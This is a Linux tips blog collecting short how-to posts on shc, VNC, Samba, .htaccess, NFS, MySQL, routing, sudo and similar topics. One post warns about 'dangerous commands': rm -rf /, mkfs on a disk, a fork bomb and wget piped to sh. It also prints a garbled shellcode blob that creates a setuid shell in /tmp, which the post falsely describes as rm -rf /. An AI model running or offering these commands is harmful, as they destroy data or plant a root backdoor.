linux poison RSS
linux poison Email

Creating executable of Shell Script

Many times it happen that shell scripts that we write contains sensitive information like password or some sort of keys or path to some sensitive files and if you running such script it become very easy for the normal user to have a look inside the script and get the sensitive information from the code.
There is a program called "shc" which can provide the protection from such cases that developer wants.

shc itself is not a compiler such as cc, it rather encodes and encrypts a shell script and generates C source code with the added expiration capability. It then uses the system compiler to compile a stripped binary which behaves exactly like the original script. Upon execution, the compiled binary will decrypt and execute the code with the shell -c option. Unfortunatelly, it will not give you any speed improvement as a real C program would.

shc's main purpose is to protect your shell scripts from modification or inspection. You can use it if you wish to distribute your scripts but don't want them to be easily readable by other people.

Download shc (here) and untar it:
tar -xzvf shc-X.X.tgz
cd shc-X.X/
make install
This will install the shc binary on your box.

Create a file called: and add the following contents for testing purpose

############################### ##############################
echo "This is a test shell script by Nikesh"
############################### ##############################

Now run the command:
shc -f

The switch "-f" specifies the source script to encrypt. The above command will create two files: and The encrypted shell script is: Run that binary and see the output:

This is a test shell script by Nikesh
Now you can distibute the without any fear

You can also specify a time limit on the shell script so that it will no longer execute after a certain date (expire) and you can specify a custom message to echo back to the user.

shc -e 09/12/2008 -m "Licence expire, please contact author - Nikesh" -f
./ has expired!
Licence expire, please contact author - Nikesh

Check out the man pages for more info on "shc".
Read more

Quick and Easy VNC Server setup

VNC, or Virtual Networked Computing, is a way of controlling a remote computer just as though you are sitting in front of it. In the Windows world it is also known as remote desktop but it's normally referred to as VNC in the Linux world. All that happens is that you connect using a VNC client to a remote computer running the VNC server, then an image of the remote desktop is transmitted to your local computer and you can see and control the desktop just as though you are there since all keyboard and mouse commands are sent from your client machine to the server.

Step:1: Installation
First check if you already have them installed on your system, open a terminal and type:
 $ rpm -qa | grep vnc 
If you get an output something like this then you're all ready, if not you need to install them via yum.

Step 2 : Start the VNC server.
$ vncserver

New 'server:1 (user)' desktop is server:1

This will ask for password, you need to remember this password and need to provide it at the time of connecting to the server through VNC client.

Step 3 : Connecting from VNC client
From client run vncviewer   (dont run remote desktop connection from winxp or win2003 .they are using different protocol.)
In server enter : server:1
enter password: **********
And you will see the screen with one terminal open because by default vnc starts twm desktop.
For getting your gnome desktop
Go to folder /user/.vnc/ (user home directory) and open file xstartup using vi editor and uncomment or add the following lines
exec /etc/X11/xinit/xinitrc
Restart the vncserver and connect to it using vncviewer, you should now see your default desktop, something like ..
Read more

A script for managing file archives of various types

atool  is a script for managing file archives of various types (tar, tar+gzip, zip etc).

The main command is aunpack which extracts files from an archive. Did you ever extract files from an archive, not checking whether the files were located in a subdirectory or in the top directory of the archive, resulting in files scattered all over the place? aunpack overcomes this problem by first extracting to a new directory. If there was only a single file in the archive, that file is moved to the original directory. aunpack also prevents local files from being overwritten by mistake.

The other commands provided are apack (to create archives), als (to list files in archives), and acat (to extract files to standard out). As atool invokes external programs to handle the archives, not all commands may be supported for a certain type of archives.

atool identifies archives by their file extension. Sometimes this is not possible - for instance rar archives usually have varying numeric file extensions. In those cases when atool can't identify the format, file is used instead. (atool can be configured not to use file.)

atool is written in Perl by Oskar Liljeblad and is free software (GNU General Public License ).

The latest version of atool is 0.35.0, which was released on 2008-06-08:
Source code tarball
Debian package (all architectures)
RPM package (all architectures)

Building from source
To build all files, simply run: ./configure
The configure script accepts a few options - use the following command to show them: ./configure --help

Installing atool is a matter of copying the atool file to some appropriate directory for executable files, usually /usr/local/bin. After that, symbolic links for apack, aunpack, als and acat to atool should be created in the same directory. All this can be done automaticly by running: make install

Usage and Configuration
A list of options that atool accepts can be displayed by running atool with the --help option:  atool --help
Please see the manual page for atool for full use and configuration information. This document can usually be viewed this way:  man ./atool.1
Read more

Firewall for Ubuntu - Gufw

iptables is already a very powerful tool by itself, but it's syntax can get awkward at times and hard to figure out, so Ubuntu developers decided to make ufw ("The reason ufw was developed is that we wanted to create a server-level firewalling utility that was a little bit more for `human beings`."), which was to be simpler. Now, on the graphical side of things, Firestarer already existed. But why not make an even easier to use GUI for desktop `human beings`, powered by ufw? This is where Gufw  comes in.

Gufw is an easy to use Ubuntu  / Linux firewall, powered by ufw.

Gufw is an easy, intuitive, way to manage your Linux firewall. It supports common tasks such as allowing or blocking pre-configured, common p2p, or individual ports port(s), and many others! Gufw is powered by ufw , runs on Ubuntu, and anywhere else Python, GTK, and Ufw are available.

You can install it on ubuntu with this deb package: here
Read more

Creating Recycle Bin for Samba storage

I assume that you have successfully configure the samba server, if not, here is a quick and dirty samba configuration guide -  here

Samba is mainly used to share the files between Linux and windows and many times it happens that user deletes the file from the samba server and later wants to get back deleted files which is not possible with the default configuration of samba server.

The best option is to have a "Recycle bin" for every users on the samba server.
Here is an example of modifying the home directories of your users in samba configuration file
comment = Home Directory
valid users = %S
browsable = no
guest ok = no
read only = no
vfs object = recycle
recycle:repository = RecycleBin
recycle:keeptree = yes
recycle:exclude = *.tmp, *.bak
The “vfs object” line calls in the plug-in that enables recycle bin capability.  On the other lines, you’re setting the name of the recycle bin directory, telling Samba to preserve the whole structure of any directories that a user may delete, and finally, telling it to not keep certain types of files.
Read more

Using .htaccess for password protecting web directory

Htaccess can be used to password-protect directories on your web site. All files and any subdirectories within a directory protected by htaccess will also be protected.

1) Create a file named .htaccess under the directory which you want to protect

# cd /srv/www/htdocs/protect/
# pwd

Use your favourite editor to create a file called .htaccess

# touch .htaccess

2) Add the required lines to this .htaccess file
AuthUserFile /etc/apache/.htpasswd
AuthName "Auth required"
AuthType Basic
Require valid-user
It's good idea to place the password file at some secure place (/etc/apache) folder

3) Create the .htpasswd file and add the users/passwd
# cd /etc/apache
# htpasswd2 -c .htpasswd nikesh
New password:
Re-type new password:
Adding password for user nikesh
This will add the user "nikesh" and password into the .htpasswd file, you can open and check the entry (you won't be able to read the password)

To delete the user entry:  # htpasswd2 -D .htpasswd nikesh
To add new user:  # htpasswd2 .htpasswd user

4) Configure the apache configuration file (httpd.conf)
Alias /protect "/srv/www/htdocs/protect/"

        Options Indexes MultiViews FollowSymLinks
        AllowOverride AuthConfig
        Order allow,deny
        Allow from all

When you set up .htaccess files it will be effective for the directory that they are placed in as well as any subdirectories.  If you wanted to set up a direcotory so that it could execute CGI scripts you could use a .htaccess file to do that.

Here the most important part is the option "AuthConfig" for "AllowOverride", if for some reason you don't want to use the .htaccess file, just place the option "None" for "AllowOverride".

5) After doing all the required changes, restart the apache server.

Now, just browse to the directory path that you have protected and see if you are getting the username/password dialog, provide the correct values and see if you are allow to enter.

Below are the most common problems experienced by users attempting to setup htaccess.

   1. Permissions on both .htaccess and .htpasswd - Both the .htaccess and .htpasswd files need to be world readable.
   2. Fully qualified path to .htpasswd incorrect - The correct fully qualified path to a valid .htpasswd file must appear beside AuthUserFile in the .htaccess file.
   3. The username doesn’t exist in .htpasswd
Read more

System Information

This displays processor information, including its type, make, model, and performance.
This shows which DMA channels are currently being used.
This shows which interrupts are in use and how many of each have been in use.
This displays the status of I/O (input/output) memory.
This shows which I/O ports are in use at the moment.
This displays memory status.
This displays the individual modules.
This displays devices currently mounted.
This shows the partitioning of all hard disks.
This displays the current version of Linux.
Read more

OpenSuse Log files

Log File
Messages from the desktop applications currently running. The ~ is the home directory of the current user.
Log files from AppArmor, see Novell AppArmor Administration Guide (↑Novell AppArmor Administration Guide) for detailed information.
Log file from Audit to track any access to files, directories, or resources of your system and trace system calls.
Messages from the kernel during the boot process.
Messages from the mail system.
Ongoing messages from the kernel and system log daemon when running.
Log file from NetworkManager to collect problems with network connectivity
Directory containing Samba server and client log messages.
Hardware messages from the SaX display and KVM system.
All messages from the kernel and system log daemon assigned WARNING level or higher.
Binary file containing user login records for the current machine session. View it with last.
Various start-up and runtime logs from the X Window system. It is useful for debugging failed X start-ups.
Directory containing YaST's actions and their results.
Log file of zypper.
Read more

Linux Directory Structure

Root directory—the starting point of the directory tree.
Essential binary files, such as commands that are needed by both the system administrator and normal users. Usually also contains the shells, such as Bash.
Static files of the boot loader.
Files needed to access host-specific devices.
Host-specific system configuration files.
Holds the home directories of all users who have an account on the system. Only root's home directory is not located in /home but in /root.
Essential shared libraries and kernel modules.
Mount points for removable media.
Mount point for temporarily mounting a file system.
Add-on application software packages.
Home directory for the superuser root.
Essential system binaries.
Data for services provided by the system.
Temporary files.
Secondary hierarchy with read-only data.
Variable data such as log files.
Only available if you have both Microsoft Windows* and Linux installed on your system. Contains the Windows data.
Read more

NFS configuration for central storage

Configuring The NFS Server
1. Edit the /etc/exports file to allow NFS mounts of the /home directory with read/write access.

/home                   *(rw,sync,no_subtree_check)

The option listing for each machine will describe what kind of access that machine will have. Important options are:

ro: The directory is shared read only; the client machine will not be able to write to it. This is the default.

rw: The client machine will have read and write access to the directory.

no_root_squash: By default, any file request made by user root on the client machine is treated as if it is made by user nobody on the server. (Excatly which UID the request is mapped to depends on the UID of user "nobody" on the server, not the client.) If no_root_squash is selected, then root on the client machine will have the same level of access to the files on the system as root on the server. This can have serious security implications, although it may be necessary if you want to perform any administrative work on the client machine that involves the exported directories. You should not specify this option without a good reason.

no_subtree_check: If only part of a volume is exported, a routine called subtree checking verifies that a file that is requested from the client is in the appropriate part of the volume. If the entire volume is exported, disabling this check will speed up transfers.

sync: By default the exportfs command will use async behavior, telling a client machine that a file write is complete - that is, has been written to stable storage - when NFS has finished handing the write over to the filesysytem. This behavior may cause data corruption if the server reboots, and the sync option prevents this.

2. Let NFS read and make /home available to the network with the exportfs command.

# exportfs -a

3. Make sure the required nfs, nfslock, and portmap daemons are running and configured to start after the next reboot.

# chkconfig nfslock on
# chkconfig nfs on
# chkconfig portmap on

# service portmap start
# service nfslock start
# service nfs start

Configuring The NFS Client
1. Make sure the required netfs, nfslock, and portmap daemons are running and configured to start after the next reboot.

# chkconfig nfslock on
# chkconfig netfs on
# chkconfig portmap on

# service portmap start
# service netfs start
# service nfslock start

2) Now mount the NFS (server) /home to this client

# mount server:/home /home/

3) Configure autofs edit your /etc/auto.master file to refer to file /etc/auto.home for mounting information whenever the /home directory is accessed. After five minutes, autofs unmounts the directory.

# vi /etc/auto.master
/home      /etc/auto.home --timeout 600

4) Edit file /etc/auto.home to do the NFS mount whenever the /home directory is accessed.

# vi /etc/auto.home
*   -fstype=nfs,soft,intr,rsize=8192,wsize=8192,nosuid,tcp server:/home/&
Read more

Multimedia support in OpenSuse 11.1 (MP3, MPEG-4, DiVX, etc.)

Why doesn’t OpenSuSe support MP3 ‘out of the box’?
OpenSuSe cannot include support for MP3 or DVD video playback or recording. MP3 formats are patented, and the patent holders have not provided the necessary licenses. OpenSuSe also excludes other multimedia software due to patent, copyright, or license restrictions, such as Adobe Flash Player and RealNetworks RealPlayer.
That doesn’t mean you can’t play .mp3 files in OpenSuSe , it just takes a bit of work (not much).

Follow these instructions to get mp3 and other multimedia support on your OpenSuSe 11.1.

If you are using KDE - Download and run (execute) this
If you are using Gnome - Download and execute this

Want VLC player - Download and run this

This will enable you to have:
Latest Amarok (with MP3 Support) for KDE, or Helix-Banshee for GNOME users
Encrypted DVD (libdvdcss)
Extra XINE Codecs, for DivX/Xvid etc. (libxine1)
K3b with MP3 Support (k3b-codecs)
Win 32 Codecs (w32codec-all)

And after sucesfull installation you should be able to play any media files.

Read more

How to change the Mysql users and root password

There are two way to change the mysql user and root password

If you have never set a root password for MySQL, the server does not require a password at all for connecting as root. To setup root password for first time, use mysqladmin command at shell prompt as follows:

$ mysqladmin -u root password NEWPASSWORD

However, if you want to change (or update) a root password, then you need to use following command

$ mysqladmin -u root -p oldpassword newpass

Enter password:
Change MySQL password for other user

To change a normal user password you need to type (let us assume you would like to change password for nikesh):

$ mysqladmin -u nikesh -p oldpassword newpass

Changing MySQL root user password using mysql sql command
This is another method. MySQL stores username and passwords in user table inside MySQL database. You can directly update password using the following method to update or change password for user vivek:

1) Login to mysql server, type following command at shell prompt:

$ mysql -u root -p

2) Use mysql database (type command at mysql prompt):

mysql> use mysql;

3) Change password for user nikesh:

mysql> update user set password=PASSWORD("NEWPASSWORD") where User='nikesh';

4) Reload privileges:

mysql>  flush privileges;
mysql> quit
Read more

Recovering deleted file using Foremost

Ever deleted an important file? I haven’t recently done this on Linux, but when I used Windows I had a utility for recovering deleted files.

Foremost is a command line utility for finding and recovering deleted files based on their type. It was origionally developed for the US Air Force Office of Special Investigations.

How is this type of data recovery possible? When you delete a file, the data is not really overwritten. The pointer in the filesystem to the file is simply removed so the disk area can be overwritten when necessary. The more the disk is written to after the file is deleted, the larger the chance it will be overwritten and become unrecoverable.

I decided to test out Foremost in a virtual machine. First, I created some JPEG images, deleted them, and emptied the trash. Next, I shutdown the system and booted up the Ubuntu 8.04 Beta live-CD. Live-CDs don’t write to the hard disk, so they work well for data recovery.

To install in Ubuntu is rather simple, just issue the standard “sudo apt-get install foremost” command. You will have to check if you use another distro if it’s in your repositories, if not, the source can be grabbed at the link at the top of the screen and can be compiled - check this.

You need to know your target partition’s path to recover from it. You can simply start System-Administration->Partition Editor in Ubuntu, or use fdisk, Qtparted or any partition editor to see what discs are for what purpose. I saw the the home partition is /dev/sda1 on my machine.

Let’s recover some JPEG images:

sudo foremost -t jpeg -i /dev/sda1

Now the -t switch denotes that you’re looking for a file type. The -i switch denotes you’re looking on a particular device. This command causes Foremost to create a directory called output and put every file it can recover in. This could take a while.

Foremost isn’t the greatest solution; it recovers every file it sees and doesn’t support very many file types. It is possible to add types to the /etc/foremost.conf file, but it doesn’t look an easy task. However, if you’ve lost a bunch of photos or documents, Foremost could be just what you need.

Check out the man pages for more.
Read more

Installation and Configuration of VMWare on Ubuntu Interpid (8.10)

1 - First, obtain a license from VMware here

2 - Install the following packages
apt-get install linux-source-2.6.27 linux-libc-dev xinetd

3 - Then, download VMware
Untar: tar -xvzf VMware-server-1.0.8-126538.tar.gz
cd vmware-server-distrib/

4 - Run the installer
-> Answer yes to each question until it (run the configure script), to which reply "No"

5 - Now, it is necessary to download the patch in order to build the kernel module (Tested with 2.6.27-7-generic)
tar -xvzf vmware-update-2.6.27-5.5.7-2.tar.gz
cd vmware-update-2.6.27-5.5.7-2

-> Answer yes to all questions and press ENTER to use the default settings.

6 - Check whether the service is running

/etc/init.d/vmware status
Bridged networking on /dev/vmnet0 is running
Host-only networking on /dev/vmnet1 is running
Host-only networking on /dev/vmnet8 is running
NAT networking on /dev/vmnet8 is running
Module vmmon loaded
Module vmnet loaded
Read more

Gnome 3 mockup screenshots

Read more

Configure Amarok to use MySQL DB

Amarok 1.2 and above support a MySQL database backend in addition to the built-in SQLite database engine.

Amarok 1.4 requires MySQL 4.0 or better, and is known to work with MySQL versions up to 5.0.22 (but, at the time of writing, not 5.0.24). Since Amarok-1.4.2 MySQL-5.0.24 also works. Amarok 1.4.5 work with MySQL 5.0.27.

Older versions of Amarok may work best with MySQL versions < 5.0. One known problem as a result of this is Amarok's DB continually growing and adding multiple entries for every track on each rescan.

If your locale is UTF-8, make sure the default character set for your mqsl daemon is set up to utf8, so that all databases and tables are created with character set utf8. In Debian:

1) Edit /etc/mysql/my.cnf, adding this line to stanzas [client] and [mysqld]:

default-character-set = utf8

2) Restart the mqsql daemon to pick up the new default charset

Do this before you create the database for amarok.

Make sure the MySQL daemon is running. If necessary, add it to your linux startup scripts, via whatever method your distro uses.

Create a root password for MySQL, if you have not already done so.
$ mysql -u root
set password for root@localhost = password('xxxxxxx');
flush privileges;
Of course change xxxxxx to the password you want.

Once you have done that, you must create a MySQL database and a user for amarok for through any usual method. You can just use the "mysql" command: (it will ask for your MySQL root password)
$ mysql -p -u root
USE amarok;
In the above example, a database called "amarok" and a user called "amarok" were created. This user can access the database from localhost using the password "PASSWORD_CHANGE_ME". To allow access from remote hosts, use amarokuser@'%'.

It is very important that you 'GRANT ALL' privileges to user "amarok". In particular, "amarok" needs ALTER privileges on its database.

Once a database exists, open the Configure Amarok screen (found in the Settings menu), and go to the Collection tab. Change the drop-down menu from SQLite to MySQL. You will have to specify the host ("localhost" if the database is in your local box), port (3306 is the common value), and the name of the database that you have created for it ("amarok" in our example). Additionally, the username and password of a user who has write access to the given database needs to be specified (in our example, the user is "amarok", and the password is "PASSWORD_CHANGE_ME").

So if you get errors about not being able to connect to the server or database, (_not_ password related errors) then you will have to edit my.cnf on the host machine (/etc/mysql/my.cnf, most likely), comment out the "bind_address" variable and restart MySQL. You may have to comment out "skip_networking", so that MySQL will listen on a tcp socket.
Read more

The 7 most dangerous commands of GNU/Linux

1. rm-rf /
This powerful command deletes all files in our root directory "/" if they want to see the power of this command to see this video

2. Code:

char esp [] __attribute__ ((section (. "text"))) / * esp
release * /
= "\ Xeb \ x3e \ x5b \ x31 \ xc0 \ x50 \ x54 \ x5a \ X83 \ xec \ x64 \ x68?
"\ Xff \ xff \ xff \ xff \ x68 \ xdf \ xd0 \ xdf \ xd9 \ x68 \ x8d \ x99?
"\ Xdf \ x81 \ x68 \ x8d \ x92 \ xdf \ xd2 \ x54 \ x5e \ xf7 \ x16 \ xf7?
"\ X56 \ X04 \ xf7 \ X56 \ x08 \ xf7 \ X56 \ x0c \ X83 \ xc4 \ x74 \ X56?
"\ X8d \ x73 \ x08 \ X56 \ x53 \ x54 \ X59 \ xb0 \ x0b \ xcd \ x80 \ x31?
"\ Xc0 \ x40 \ xeb \ xf9 \ xe8 \ xbd \ xff \ xff \ xff \ x2f \ x62 \ x69?
"\ X6e \ x2f \ x73 \ x68 \ x00 \ x2d \ x63 \ x00?
"Cp-p / bin / sh / tmp / .beyond; chmod 4755
/ tmp / .beyond; "

This is the hex version of [rm-rf /] that can deceive even those not experienced users of GNU/Linux.

3. mkfs.ext3 / dev / sda

This will reformat all the files on the device that is mentioned after the mkfs command.

4. :(){:|:&};:

Known as forkbomb, this command to run a large number of processes until the system freezes. This can lead to data corruption.

5. any_command> / dev / sda

This command causes total loss of data, in the partition that is mentioned in command

6. http://some_untrusted_source wget-O-| sh

Never download untrusted sources and below are implemented, they may be malicious codes

7. mv / home / yourhomedirectory / * / dev / null

This command will move all the files in your home to a place that does not exist, never really your files again

If you got any other dangerous command, please let me know, I will include it over here.

Read more

Running Linux on Windows XP

"If Linux runs on every architecture, why should another operating system be in its way? "

Cooperative Linux is the first working free and open source method for optimally running Linux on Microsoft Windows natively. More generally, Cooperative Linux (short-named coLinux) is a port of the Linux kernel that allows it to run cooperatively alongside another operating system on a single machine.

For instance, it allows one to freely run Linux on Windows 2000/XP, without using a commercial PC virtualization software such as VMware, in a way which is much more optimal than using any general purpose PC virtualization software.

Unlike in other Linux virtualization solutions such as User Mode Linux (or the forementioned VMware), special driver software on the host operating system is used to execute the coLinux kernel in a privileged mode (known as ring 0 or supervisor mode).

coLinux is a port of the standard Linux kernel. In other words, coLinux is the Linux kernel that's modified to run cooperatively with another operating system. The host operating system (Windows or Linux) maintains control of the physical resources of the operating system, while the guest operating system (coLinux) is provided with a virtual abstraction of the hardware. The host operating system must provide the means to execute a driver in the privileged ring (ring 0) and export the means to allocate memory

The root file system for coLinux is a regular file within the host operating system. To Windows it's just a regular file, but to coLinux it's an ext3 file system that can be read and written to..

To cooperatively share hardware with the host operating system, coLinux does not access I/O devices directly. Instead, it interfaces with emulated devices provided by the coLinux drivers in the host OS. For example, a regular file in Windows can be used as a block device in coLinux. All real hardware interrupts are transparently forwarded to the host OS, so this way the host OS's control of the real hardware is not being disturbed and thus it continues to run smoothly.

Unlike User Mode Linux, coLinux always utilizes only one process of the host OS for all its Linux processes, privately managing their scheduling, resources, and faults in a manner which is contained and entirely independent of the way the host OS is implemented. In fact, coLinux only requires a very small set of commonly exported primitives from the host OS kernel in order to work, thus, it can be rather easily ported to run under any operating system, such as Solaris, or even Linux itself.

Download: here
Read more

Configure Routing , NAT and Gateway in Linux

A router is a device that directs network traffic destined for an entirely different network in the right direction. For example, suppose your network is having the IP address range of and you also have a different network which has a network addresses in range . Note that these are ‘Class C’ network addresses which are sub netted. So for your computer ( on the network ) to directly communicate between a computer in the network, you need a intermediary to direct the traffic to the destination network. This is achieved by a router.

Configuring Linux as a router
Linux can be effectively configured to act as a router between two networks. To activate routing functionality , you enable IP forwarding in Linux. This is how you do this:

# echo “1″ > /proc/sys/net/ipv4/ip_forward

Now you have enabled IP forwarding in Linux. Now make this change persistent across reboots by editing the file /etc/sysctl.conf and entering the following line:

# vi /etc/sysctl.conf

net.ipv4.ip_forward = 1

Optionally, after editing the above file, you may execute the command :
# sysctl -p

Note: For your linux machine to act as a router, you need two Ethernet cards in your machine or you can also configure a single ethernet card to have multiple IP addresses.

What is a gateway?
Any device which acts as the path to or from your network to another network or the internet is considered to be a gateway. Let me explain this with an example: Suppose your computer, machine_B has an address with default netmask. And another computer (machine_A) with an IP address in your network is connected to the internet using a USB cable modem. Now if you want machine_B to send or recieve data destined for an outside network a.k.a internet, it has to direct it to machine_A first which forwards it to the internet. So machine_A acts as the gateway to the internet. Each machine needs a default gateway to reach machines outside the local network. You can set the gateway in machine_B to point to machine_A as follows:
# route add default gw machine_A

Or if DNS is not configured…

# route add default gw

Now you can check if the default gateway is set on machine_B as follows:

# route -n

Note: Additional routes can be set using route command. To make the changes persistent across reboots, you may edit the /etc/sysconfig/static-routes file to show the configured route.

What is NAT ?
Network Address Translation (NAT) is a capability of linux kernel where the source or destination address / port of the packet is altered while in transit.

This is used in situations where multiple machines need to access the internet with only one official IP address available. A common name for this is IP masquerading. With masquerading, your router acts as a OSI layer 3 or layer 4 proxy. In this case, Linux keeps track of the packet(s) journey so that during transmission and recipt of data, the content of the session remains intact. You can easily implement NAT on your gateway machine or router by using Iptables, which I will explain in another post.
Read more

Alternate Linux desktops (Window Manager)

Most Linux users are familiar with KDE and GNOME, as both are desktop environments used by most major Linux distributions but there are some really good alternate window manager out there. If you have some old PC with minimum hardware and want to run GUI on it then in this case the list of window manager provided below will definitely help you to chose one ..

It is a lightweight desktop environment for Unix operating systems. The main goal is to be fast and light, while being visually attractive and easy to use. It is based on the GTK + toolkit same as GNOME, so if you are Gnome fan, you'll find XFCE very usefull.

Enlightenment is a themeable, fast, flexible, and powerful window manager that is designed to be as configurable as possible in both look and feel. In addition, Enlightenment provides an applet API that provides functionality somewhere between the GNOME applet system and Dock Apps from Afterstep/WindowMaker. The current design aim is for Enlightenment to become a desktop shell..

FVWM-Crystal aims to create an easy to use, eye-candy but also powerful desktop environment for Linux or other Unix-like operating systems. It uses following programs: FVWM as a window manager and "main core", ROX-Filer as file manager (manages icons on the desktop), xterm, aterm, mrxvt or urxvt as terminal emulators, MPD or XMMS as music players (there's built-in support for controlling these programs), and several other tools for different functions, like setting a wallpaper or making screen shots.

"Lightweight X11 Desktop Environment", is an extremely faster, performing and energy saving Linux desktop environment maintained by an international community of developers. It comes with a beautiful interface, multi-language support, standard keyboard short cuts and additional features like tabbed file browsing. LXDE uses less CPU and less RAM. It is especially designed for computers with low hardware specifications like netbooks, mobile internet devices (MIDs) or older computers. LXDE can be installed with distributions like Ubuntu or Debian. Applications running on these systems will run with LXDE. The source code of LXDE is licensed partly under the terms of the General Public License and partly under the LGPL.

IceWM is simple and highly configurable. All settings are stored as plain text files on the user's home directory, so it is easy to customize and configure it. You can apply your favorite theme and make it appear Windows Vista, Mac OS X or whatever you want.

Fluxbox is a windowmanager for X that was based on the Blackbox 0.61.1 code. It is very light on resources and easy to handle but yet full of features to make an easy, and extremely fast, desktop experience. It is built using C++ and licensed under the MIT-License.

Window Maker
Window Maker is an X11 window manager originally designed to provide integration support for the GNUstep  Desktop Environment. In every way possible, it reproduces the elegant look and feel of the NEXTSTEP[tm] user interface. It is fast, feature rich, easy to configure, and easy to use.

Window Maker includes compatibility options which allow it to work with other popular desktop environments, namely GNOME and KDE, and comes with a powerful GUI configuration editor, called WPrefs, which removes the need to edit text-based config files by hand.

AfterStep is a window manager for the Unix X Window System. Originally based on the look and feel of the NeXTStep interface, it provides end users with a consistent, clean, and elegant desktop. The goal of AfterStep development is to provide for flexibility of desktop configuration, improving aestetics, and efficient use of system resources.

Some of the distinguishing features of AfterStep compared to other window managers are its low usage of resources, stability and configurability.

Read more

Songbird 1 (Final) Linux Installation on Fedora, Ubuntu and Others

Songbird project is a desktop Web player, a digital jukebox and Web browser mash-up. Like Winamp, it supports extensions and skins feathers.

Like Firefox, it is built from Mozilla, cross-platform and open source.

Fedora Linux:
Provided by Auralvance (Rutgers University)
Updated: 12/6/08 1.0.0 Rev 1
NOTES: For MP3 and other audio licensed playback you must have the full compliment of gstreamer plugins installed (good, bad, ugly, etc) - Check here

Songbird 1.0.0 - Fedora 9 - i386
Songbird 1.0.0 - Fedora 9 - x86_64

Songbird 1.0.0 - Fedora 10 - i386
Songbird 1.0.0 - Fedora 10 - x86_64

After downloading the rpm file, you just need to install the pakage using command :
# rpm -ivh songbird-1.0.0-1.fc9.i386.rpm

Ubuntu Linux (.deb)
Ubuntu Intrepid 32 bits -  1.0.0
Ubuntu Intrepid 64 bits - 1.0.0  

Right-click the downloaded .tar.gz file after you downloaded it from and extract it.

Double-click the file called “songbird” in the newly created folder.

The first time you’ll have to agree to some EULA, it will ask you if you want to scan your pc for music files. It will also suggest some recommended add-ons.

 you move that folder to your home directory and add a launcher for it in your “application -> sound and video” menu.

Go to “system -> preferences -> main menu”, and create a new entry in the sound and video menu. In the command box simply link to the songbird file. If you have the songbird folder in your home directory that would be /home/yourusernamehere/Songbird/songbird. 

Here are some key features of "SongBird":
Play Anything:
· MP3, AAC, OGG, FLAC, WMA, and more. Can you teach Songbird to sing?

Pick Feathers:
· Choose from the two included themes: Rubberducky or Dove. You can even make one yourself.

Control the Flow:
· Play, Pause, Previous, Next, Volume, Mute, Seek, Three Repeat Modes, and Shuffle.

· Quickly switch between tasks using the buttons to the right of the dashboard display.

Organize Your Library:
· Filter your collection by Genre, Artist, Album, and Song or Search-As-You-Type.

Scan Your Computer for Music:
· Songbird will find your music and add it to your collection for you.

Super Slim Mini-Mode:
· Use the mini-mode for basic controls while keeping Songbird out of the way.

Multi-Language Support:
· Songbird comes in 39 languages. Be a localizer and see Songbird in your language!

Build Custom Mixes:
· Drag-and-drop songs from the Library or another playlist to your create your own custom mixes.

Make Smart Mixes:
· Criteria-based playlists that are always up-to-date with your current collection.

Dynamic Mixes:
· Get mixes from the Internet and stay up-to-date with the latest updates, downloads, and casts.

Play In Place:
· Songbird plays MP3s without leaving the page.

Play the Web:
· Play web pages as playlists and view any web page as a playlist.

Set Music Watch Folders:
· Tell Songbird to watch a folder for new music and it will automatically add new tracks to your collection

· We now use GStreamer as our main media playback system, across all platforms - giving us higher performance, better reliability, and a platform for much more media-related functionality in the future.

Improved Album Art Support:
· The album artwork feature now supports drag and drop of images, as well as, toggling between Now Playing and Currently Selected tracks.
Read more

MyDNS + MyDNSConfig installation and configuration

MyDNS is a free DNS server for UNIX. It was implemented from scratch and is designed to serve records directly from an SQL database (currently either MySQL or PostgreSQL).

Its primary objectives are stability, security, interoperability, and speed, though not necessarily in that order. MyDNS does not include recursive name service, nor a resolver library. It is primarily designed for organizations with many zones and/or resource records who desire the ability to perform real-time dynamic updates on their DNS data via MySQL.

MyDNS starts and is ready to answer questions immediately, no matter how much DNS data you have in the database. It supports a few frills, including round robin DNS, dynamic load balancing, and outgoing AXFR for non-MyDNS nameservers and is licensed under the GNU General Public License.

First make sure you have a working setup of Apache and mysql

Download MyDNSConfig:
# wget
# tar xvfz MyDNSConfig-1.1.0.tar.gz
# cd MyDNSConfig-1.1.0
# mkdir /srv/www/htdocs/mydnsconfig
# cp -rf interface/* /srv/www/htdocs/mydnsconfig

Above "/srv/www/htdocs/" is my web directory

Mysql database setup::
# mysql -u root -p

> GRANT SELECT, INSERT, UPDATE, DELETE ON mydns.* TO 'mydns'@'localhost' IDENTIFIED BY 'mydnspassword';
> GRANT SELECT, INSERT, UPDATE, DELETE ON mydns.* TO 'mydns'@'localhost.localdomain' IDENTIFIED BY 'mydnspassword';
> quit;

Replace the word mydnspassword in the above commands with a password of your choice.

Install the MyDNSConfig MySQL Database:

# mysql -u root -p mydns < MyDNSConfig-1.1.0/install/mydnsconfig.sql

Edit the MyDNSConfig configuration; please make sure you fill in the correct database settings:
# vi /srv/www/htdocs/mydnsconfig/lib/

$conf["db_type"]        = 'mysql';
$conf["db_host"]        = 'localhost';
$conf["db_database"]        = 'mydns';
$conf["db_user"]        = 'mydns';
$conf["db_password"]        = 'mydnspassword';

Installing MyDNS
# wget
# rpm -ivh mydns-mysql-1.1.0-1.i386.rpm

Open the MyDNS configuration file /etc/mydns.conf, fill in the correct database details, allow zone transfers by setting allow-axfr to yes, enable TCP (allow-tcp = yes), and specify a recursive resolver (i.e., a valid nameserver, e.g. from your ISP; e.g. recursive = so that MyDNS can answer queries for domains that it isn't authoritative for:

# vi /etc/mydns.conf

Finally start the mydns server
# /etc/init.d/mydns start

To log in to the MyDNSConfig interface, open a web browser and enter enter the following URL:


Replace with the IP address of your server.

The default username and password of MyDNSConfig are:

Username: admin
Password: admin
Read more

Configuring sudo and adding users to Wheel group

If a server needs to be administered by a number of people it is normally not a good idea for them all to use the root account. This is because it becomes difficult to determine exactly who did what, when and where if everyone logs in with the same credentials. The sudo utility was designed to overcome this difficulty.

With sudo (which stands for "superuser do"), you can delegate a limited set of administrative responsibilities to other users, who are strictly limited to the commands you allow them. sudo creates a thorough audit trail, so everything users do gets logged; if users somehow manage to do something they shouldn't have, you'll be able to detect it and apply the needed fixes. You can even configure sudo centrally, so its permissions apply to several hosts.

The privileged command you want to run must first begin with the word sudo followed by the command's regular syntax. When running the command with the sudo prefix, you will be prompted for your regular password before it is executed. You may run other privileged commands using sudo within a five-minute period without being re-prompted for a password. All commands run as sudo are logged in the log file /var/log/messages.

The sudo configuration file is /etc/sudoers. We should never edit this file manually. Instead, use the visudo command:  # visudo

